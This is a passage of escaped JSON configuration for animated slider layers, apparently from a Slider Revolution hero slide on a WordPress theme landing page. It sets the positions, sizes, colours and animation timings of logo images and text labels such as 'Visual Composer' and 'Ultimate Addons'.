7\",\"alias\":\"VC-logo\",\"uid\":7,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/vc-hero-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"58px\",\"e\":true},\"n\":{\"v\":\"58px\"},\"t\":{\"v\":\"58px\"},\"m\":{\"v\":\"58px\"}},\"height\":{\"d\":{\"v\":\"58px\",\"e\":true},\"n\":{\"v\":\"58px\"},\"t\":{\"v\":\"58px\"},\"m\":{\"v\":\"58px\"}},\"originalWidth\":87,\"originalHeight\":87,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-179px\",\"e\":true},\"n\":{\"v\":\"-179px\"},\"t\":{\"v\":\"-179px\"},\"m\":{\"v\":\"-179px\"}},\"y\":{\"d\":{\"v\":\"258px\",\"e\":true},\"n\":{\"v\":\"258px\"},\"t\":{\"v\":\"258px\"},\"m\":{\"v\":\"258px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":18,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"10\":{\"text\":\"Ultimate<br>\\nAddons\",\"alias\":\"UA\",\"uid\":10,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"179px\",\"e\":true},\"n\":{\"v\":\"179px\"},\"t\":{\"v\":\"179px\"},\"m\":{\"v\":\"179px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":19,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":19,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"22px\",\"e\":true},\"n\":{\"v\":\"22px\"},\"t\":{\"v\":\"22px\"},\"m\":{\"v\":\"22px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"lineHeight\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"28px\"},\"t\":{\"v\":\"28px\"},\"m\":{\"v\":\"28px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.4.0\"},\"9\":{\"text\":\"Image 9\",\"alias\":\"Addons-logo\",\"uid\":9,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/addons-hero-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"68px\",\"e\":true},\"n\":{\"v\":\"68px\"},\"t\":{\"v\":\"68px\"},\"m\":{\"v\":\"68px\"}},\"height\":{\"d\":{\"v\":\"68px\",\"e\":true},\"n\":{\"v\":\"68px\"},\"t\":{\"v\":\"68px\"},\"m\":{\"v\":\"68px\"}},\"originalWidth\":105,\"originalHeight\":105,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"497px\",\"e\":true},\"n\":{\"v\":\"497px\"},\"t\":{\"v\":\"497px\"},\"m\":{\"v\":\"497px\"}},\"y\":{\"d\":{\"v\":\"574px\",\"e\":true},\"n\":{\"v\":\"574px\"},\"t\":{\"v\":\"574px\"},\"m\":{\"v\":\"574px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true}},\"zIndex\":20,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":20,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Circle\",\"uid\":1,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/slider-logo-img-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"152px\",\"e\":true},\"n\":{\"v\":\"152px\"},\"t\":{\"v\":\"152px\"},\"m\":{\"v\":\"152px\"}},\"height\":{\"d\":{\"v\":\"152px\",\"e\":true},\"n\":{\"v\":\"152px\"},\"t\":{\"v\":\"152px\"},\"m\":{\"v\":\"152px\"}},\"originalWidth\":234,\"originalHeight\":234,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-198px\",\"e\":true},\"n\":{\"v\":\"-198px\"},\"t\":{\"v\":\"-198px\"},\"m\":{\"v\":\"-198px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":21,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":21,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"8\":{\"text\":\"Visual<br>\\nComposer\",\"alias\":\"VC\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-78px\",\"e\":true},\"n\":{\"v\":\"-78px\"},\"t\":{\"v\":\"-78px\"},\"m\":{\"v\":\"-78px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":22,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":22,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 